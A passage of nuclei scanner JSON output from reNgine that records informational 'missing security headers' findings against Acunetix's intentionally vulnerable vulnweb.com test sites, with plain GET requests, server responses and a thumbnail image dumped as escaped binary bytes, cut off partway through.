\\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:40.595996764Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:40.596089113Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:12 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u001a\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdV\\u0015\\ufffd\\ufffdgQ\\ufffd%XmƲ \\ufffd\\ufffdTg6\\ufffdru\\ufffdƲ0\\ufffd\\ufffdG\\n\\u003e2y\\ufffd\\ufffdd\\ufffdEV\\u0019m}3\\ufffd1\\ufffd\\ufffd\\u003c*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqY\\u0016`\\ufffd\\ufffdd\\ufffd\\ufffd6\\ufffdk\\\"\\ufffdw\\ufffd\\ufffdr\\ufffd{0\\ufffdqY.\\ufffd\\ufffd\\u0019*\\u003e3\\ufffd\\ufffdF\\u001e\\u0013u\\ufffd\\u000c\\ufffd\\u000f\\u0018\\ufffdDu2i\\ufffd\\ufffdh.\\ufffdH\\ufffd2\\ufffd\\ufffd\\t\\u0019^Ӗ\\ufffd.z*\\ufffdJ\\ufffd\\ufffd\\u001d\\u0014\\u0002\\ufffd@2ء\\u0012\\t\\u0018=\\ufffd+\\u0012T\\u00176.\\ufffd-\\ufffd\\ufffdEcZA\\u0012,\\ufffd*\\ufffd!\\t\\u0003o\\u0007\\ufffd:\\ufffd\\u003c\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\ufffdFh\\ufffdu\\ufffd'\\u000b\\u00086\\u0001\\u0026\\ufffd\\u0003\\ufffd\\ufffd\\u000c4\\r\\ufffd|\\ufffdӼ\\ufffd@\\u0005\\ufffd\\ufffd\\u003e[$LL\\r2Ѡ\\ufffd\\ufffd\\ufffd\\u0000\\u0019ƈ\\ufffd\\ufffd\\ufffdӅ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffd=N\\ufffd\\ufffd2\\u003ct\\ufffdR\\ufffd*Xr\\ufffdr\\ufffd\\u001d8?+\\u000b\\ufffd#2H\\ufffd\\ufffd1\\ufffd\\u0012D\\ufffdሠ\\u0006\\ufffd6\\ufffd9\\u0006\\ufffdo\\ufffd}\\ufffd\\u0001`ֻV\\ufffdV\\u000c\\ufffd\\ufffd\\ufffd./c\\ufffdY\\ufffdp\\ufffd\\ufffd4\\ufffdz\\u000fH\\ufffd\\u0011V\\n\\ufffd\\ufffd\\u001b\\ufffd\\ufffdu\\ufffd\\u0012)X\\u0005\\ufffdn\\ufffd\\ufffd:\\ufffd\\ufffdaU\\u0004\\ufffd\\ufffd\\r?\\ufffd?\\ufffd\\u0008\\ufffd\\rm^\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\r}\\ufffd\\ufffd\\nF\\ufffd\\u0019\\ufffd\\ufffdI\\u0004J\\ufffd\\u0015:\\ufffd\\u0003\\ufffdd\\ufffd?\\ufffd\\ufffdSϬ\\ufffd\\ufffd$!\\ufffdj\\u0004\\ufffd6\\ufffd_\\ufffd_\\u001fk\\ufffd\\r\\u0000\\\\\\ufffd\\ufffdUM4\\ufffd(\\u0008\\u0016\\u0017$\\ufffd\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdx$\\u000e\\u0019\\u0003q\\ufffd#ʚ\\ufffd\\u003e\\ufffd+\\u001a9\\ufffd3\\ufffd;V\\ufffd\\ufffd8\\ufffd\\ufffdc\\ufffd\\ufffdLz\\u0007Ӽ\\ufffd6\\ufffd53\\ufffd\\u0012\\ufffdeZ8\\t4\\u0018\\ufffd\\ufffd\\ufffdJ\\ufffd\\u001c\\u000e\\ufffd\\ufffd4\\ufffd@\\ufffd\\ufffdM\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\u0005EF\\ufffdr9*H\\ufffd(qV\\u000b\\ufffd\\ufffd\\ufffd,\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd%\\ufffd \\ufffd\\u0006\\ufffdB\\ufffdp\\ufffd\\u0004\\ufffd1b\\u0010\\ufffd\\ufffdj9$\\ufffd}?\\ufffd\\ufffd\\ufffd,[M\\ufffd\\ufffd\\ufffd\\u0001\\u001b\\ufffdkQ\\u001dױ\\ufffd`\\ufffd+l\\ufffdiqf\\ufffd\\ufffd\\ufffd\\ufffdWw\\ufffd%+\\u0018\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd$\\ufffdp/8󿡣\\ufffd@\\ufffd\\ufffd\\ufffdr\\ufffdE\\ufffdk\\u001d\\ufffd6\\u003c\\ufffd\\u0008\\ufffd\\ufffdc\\u0006\\ufffdIYX\\ufffd\\ufffd\\ufffd/\\ufffdq\\ufffd\\ufffdR:\\u0018\\ufffd5\\n^%e\\u001eǐ\\ufffd\\u0007\\ufffd\\ufffdU}\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffdR\\ufffd\\ufffd)\\u0000\\u0012H\\ufffd\\ufffd\\u0000\\r\\ufffd\\ufffd\\ufffd\\u003c\\ufffd9\\ufffd\\u0026\\ufffdW\\ufffdI6\\ufffd?a?9\\ufffd\\ufffd\\ufffd!\\ufffduR\\ufffd\\u0000\\ufffd51\\u003e\\ufffd\\u000e\\ufffd\\ufffd\\u001e\\u001dDl-8;ā\\ufffd\\ufffd\\ufffd\\ufffd\\u00006\\u000f?B\\u0000\\u001b\\\\n\\ufffdjꧠ\\ufffd\\ufffdq~c\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\ufffd$SH\\ufffd\\u00132L\\ufffd@\\ufffdW\\ufffd*ё\\ufffdf\\ufffdz\\ufffd\\ufffd\\u0000+\\ufffd\\ufffdm9\\ufffd\\ufffd\\ufffd\\u0014\\ufffdb*\\ufffd\\ufffdV\\ufffdZ4o\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\u001a\\ufffdٷJʭ\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000ex\\ufffd\\ufffd\\u001b\\ufffd(\\ufffd\\ufffd%\\ufffd;+\\ufffd\\ufffdU0\\ufffd\\ufffdXKo\\ufffd\\ufffd\\ufffdhi\\ufffd\\r4~\\ufffd\\ufffd~`\\ufffd\\ufffd(b»\\ufffdz׎\\ufffd\\ufffd\\ufffd\\ufffdh@`\\ufffd\\ufffd\\ufffd6\\ufffdeGݶ\\ufffd\\u0000\\ufffdV\\u0008\\ufffd\\u0005\\ufffdʦ\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd\\r\\ufffd;\\ufffd\\u001d\\t\\ufffd\\u0000@\\ufffd\\ufffds\\ufffdC\\u0014r\\ufffdR3\\u001f\\ufffd\\ufffd2\\t\\u0014i\\ufffd\\ufffd\\ufffdTG\\ufffd:\\u0010\\u0008\\ufffd\\ufffd\\ufffdB\\ufffd'\\ufffd(\\\\e\\ufffdp\\ufffd |\\ufffdR\\ufffd.\\ufffd\\u000b\\ufffd\\ufffd\\ufffdt\\u0005\\ufffd\\ufffd\\u0002C\\ufffd\\ufffd7\\u0016\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\u0007M\\ufffdE$,\\ufffd\\u0026\\u0014\\u000e\\ufffd\\u003c\\ufffd\\u0007\\ufffd\\ufffd\\u001d\\t\\ufffd4\\ufffdJҼ\\ufffd~\\ufffd\\ufffd9jC,d\\ufffdف\\u001c\\u0001\\ufffd;\\ufffd\\u0000]\\ufffd\\u0007kZ߇\\ufffd\\ufffdP\\ufffd\\ufffd\\u0015\\ufffd2\\ufffd(k\\ufffd\\ufffd/\\ufffd\\u0011\\ufffdM\\ufffd\\ufffd\\ufffd:\\ufffdd\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd林ԝ\\ufffdCpX\\ufffd\\ufffd8\\ufffd/\\ufffd\\u0016\\u003c\\ufffd\\u001c\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdkkb\\ufffdu\\u0011G/\\ufffd^O\\ufffdT\\u0014x\\ufffd}Gׯ\\ufffdŠ\\ufffdsJ\\u0015\\ufffde\\n\\ufffdw\\ufffdZW\\u0000\\ufffd\\r\\u001e/\\ufffdW{]{\\u0005\\ufffd\\ufffdUQ22]a}{\\ufffd\\u003e]OK\\ufffd\\ufffdF\\ufffd*D\\u0026\\ufffd7;\\ufffd\\ufffd{\\ufffd\\ufffdQ\\u0010\\ufffd\\ufffd\\ufffdC\\ufffdP\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffdv(\\u0001\\ufffd\\ufffdO8\\ufffdZWi\\ufffd\\ufffd\\u0001i#4֥A\\ufffdш\\ufffd\\ufffdsW]\\ufffd\\ufffd\\u0013$\\ufffd4N\\u001fiV\\ufffdn\\ufffd\\u0006\\u001c\\ufffd\\ufffd\\u0010~\\ufffd\\ufffd9#\\u0001:\\u0015F\\ufffdH\\u0003\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdA%\\ufffd\\ufffdx\\ufffd\\ufffd\\u000fw5\\ufffd\\ufffd\\ufffd\\u0003*\\ufffd\\u0003\\u0016\\ufffdIY\\ufffdHY\\u001byqE@\\ufffd\\ufffd5\\ufffd\\ufffdo\\ufffd۾\\ufffd\\ufffd\\u0012(U_dP\\ufffdV4-)$\\ufffdJ,\\ufffdl\\ufffd\\\"\\ufffd\\ufffdךˌ\\r,pƞ\\ufffds\\ufffd\\ufffd\\ufffd\\u00197B\\ufffd\\ufffd-\\ufffdC\\ufffdm\\ufffd\\ufffd\\u000f\\u0016\\r\\ufffd\\ufffdB\\ufffdf\\ufffd\\u001b\\u0014\\ufffd\\ufffd\\ufffd\\ufffd\\u001fE\\ufffdڄ\\ufffd\\ufffd\\ufffd\\ufffd18\\ufffd\\ufffd\\u001d\\ufffd\\ufffdUoU\\ufffd\\ufffd\\\"\\ufffdоؤӳ0\\u0006\\ufffdp3cT\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd5\\r$6x\\ufffd\\u0010z\\ufffd\\u0026ʶ\\ufffdTh\\u001a#\\ufffdV-\\u0002j\\u0002\\u0015\\u0005\\t\\ufffd\\ufffd\\t\\u0014M_#\\ufffd\\u001b\\u0000\\ufffd\\u0005\\u001e/+\\ufffdóJ\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffd\\ufffd%\\ufffdK\\ufffd\\ufffdR\\ufffdF\\ufffd*\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffdhi\\ufffd%d\\ufffd4\\ufffdEz\\ufffd\\u0015BG\\ufffd\\u0006\\ufffd5`t\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffd\\u0000\\ufffdI\\ufffd\\u000eù\\ufffd9\\u003ce\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdxԊfQVv\\ufffd@\\ufffd]\\ufffd\\ufffdxÂ\\ufffd\\ufffdzI\\ufffd\\ufffdc\\ufffd\\u0005u\\ufffdA#*:\\ufffdB\\u0003Q\\ufffdM\\u0003G\\ufffdDgSB\\ufffd\\ufffd\\ufffdޑ3\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u0001\\ufffdy\\u0000\\u0001\\ufffdt錬\\n\\ufffd$\\ufffd\\ufffd]\\u0001\\u0004\\ufffdˎ\\ufffdx\\ufffd\\t\\ufffd\\ufffdY\\ufffd\\u0002\\ufffd\\ufffd:d\\u001a\\ufffdA\\u0010\\ufffdf\\ufffd\\u001c\\ufffd-\\ufffd{\\ufffd-tv݁\\ufffd\\ufffd\\ufffdV2\\ufffd.W5Y\\ufffd\\u0018\\u000bKέ\\ufffd\\ufffd,yt蓕\\ufffdU\\ufffd\\ufffdfP\\ufffd[\\u0000o\\ufffd]\\u0001aۥu'\\u0011\\u0012)\\ufffd\\ufffd+\\u0017ݹ\\u001c8*\\u0008,\\u0008\\ufffd{w\\u0007\\ufffd\\ufffd\\ufffdI\\ufffd]\\u0013Țy\\ufffd\\u0012eYD\\ufffdC!dV\\u001e\\ufffd\\t5\\ufffdA\\ufffd\\u0002\\ufffd\\ufffd\\u000eT\\ufffdB}k\\ufffd\\ufffd1\\ufffd2\\ufffdK\\u001f\\u0014\\ufffd\\ufffd.k\\\\30\\ufffd\\ufffdF.ڗ\\u0008ݭ\\ufffd}\\ufffdj\\ufffd,o\\ufffd[\\u0013\\u001b\\u001c\\ufffd\\u001a\\ufffd\\u003cQʂ\\ufffdov]\\ufffd`\\ufffdn\\ufffd\\ufffd\\u0012mH\\ufffd\\ufffd^\\ufffd古T\\ufffd|r\\ufffd\\ufffd]\\ufffd\\u0002O\\u0015\\ufffdu'\\ufffd\\u0000\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$\\ufffd\\u00166\\ufffdrgK\\ufffd\\ufffd]\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\n_;\\ufffd\\u0000\\ufffd\\u0000}\\ufffd\\r\\ufffdj\\u0010\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsn\\ufffdN\\ufffd]\\ufffd\\ufffd뷋\\ufffd\\ufffdL\\ufffdL\\ufffdE\\u0014Q\\ufffdWolq\\ufffdv\\u0002\\ufffd/h#ڶ;\\ufffd\\ufffdrT\\u001b\\ufffd\\ufffd\\ufffd\\ufffd1X\\ufffd{I{@\\ufffd\\ufffdd\\ufffd\\ufffdd\\ufffd\\u000fóG\\ufffdD\\ufffdj\\ufffd(Ν\\ufffd\\ufffd\\tm\\u001f1a@\\ufffd\\ufffdr7X\\r^E\\ufffd@\\ufffdt\\ufffd!\\ufffdU\\ufffd+\\u001bI\\ufffd\\ufffdGP\\u0019\\ufffd\\nwn\\ufffd\\ufffd\\u0010\\u000f\\u001b\\ufffdb\\u000fZ 篡\\ufffdӟO\\u003c\\ufffd\\ufffd\\ufffdbd(\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdn\\ufffd\\ufffdo\\u001b\\ufffd\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7z\\u0016#\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdfe^\\u001a\\ufffd\\ufffd\\ufffd.kYrQ\\ufffd4E\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\u001c\\u0002NԠ\\ufffd\\u0010\\ufffd\\ufffd$w\\ufffd\\ufffdO\\ufffd0$\\u0012\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd.\\ufffdlR\\ufffdc\\ufffdH5\\ufffd\\ufffd\\ufffdŬ1\\ufffd\\ufffdY\\n\\ufffd\\u0006\\ufffd\\\\\\u0005\\u0003\\ufffd_\\u003c\\ufffdn\\ufffd՞2\\ufffd\\ufffd'u\\ufffd84s\\ufffdB\\u001a\\ufffd\\ufffdi\\ufffd\\ufffdJ\\u0002\\ufffd*\\ufffdGI1\\ufffda\\u0011\\ufffd6\\ufffdT\\ufffd\\ufffd\\u000b*\\ufffd\\u000bW\\ufffd\\u001f\\ufffd~\\ufffd\\ufffd\\ufffdP`\\ufffd\\ufffdP\\ufffd\\ufffdۻ1w\\ufffd\\ufffdfbI\\ufffd9\\ufffd\\u0000\\ufffd\\ufffdh\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\u0015QI\\u0026\\ufffd\\u0001G=z\\u0000\\u003c\\ufffd\\ufffd\\u0015_\\u0012\\ufffdi\\u0001/c@\\ufffd\\ufffdZS\\ufffdH\\ufffd\\ufffdb\\u0012\\ufffd\\ufffd\\u0018\\ufffdK\\ufffd`R9w,G\\u0000\\u0002\\r_S\\ufffd\\ufffd\\ufffdK\\ufffdַZ\\ufffd\\u0000\\ufffd~!9\\ufffd4\\ufffd\\ufffd5Dc܇jPF\\u001cݐ\\ufffdl}\\ufffd{4\\ufffd\\ufffd\\ufffd锉\\ufffd\\ufffd*fm\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd׻h\\u0015f\\ufffd\\ufffd\\u0019{z!\\ufffd\\ufffd\\u001d8W`_\\ufffd\\ufffd\\ufffd\\u0005\\ufffdW`C\\ufffd\\ufffdo\\ufffd=M\\ufffd\\u000cG\\u000fu`\\u0001\\ufffd\\ufffd\\ufffd\\u0010\\u0019%\\u003c\\ufffd\\ufffdfk\\ufffd\\ufffd\\ufffd\\ufffdI/\\ufffd4_\\u0001\\ufffd/\\ufffdf_\\ufffd,(\\ufffdHǫРM\\ufffd=\\u0005\\ufffd?z\\ufffdmY;\\ufffd\\ufffd\\ufffd\\ufffd\\t\\nzu\\ufffd\\ufffd篃]\\u000em|GYꬔ\\ufffdB\\ufffd%MY\\u0000՟\\u0000\\ufffd\\u0017]\\u003c\\ufffdkkUQ\\u0015\\ufffd\\ufffd\\ufffdV76\\ufffdD\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\uf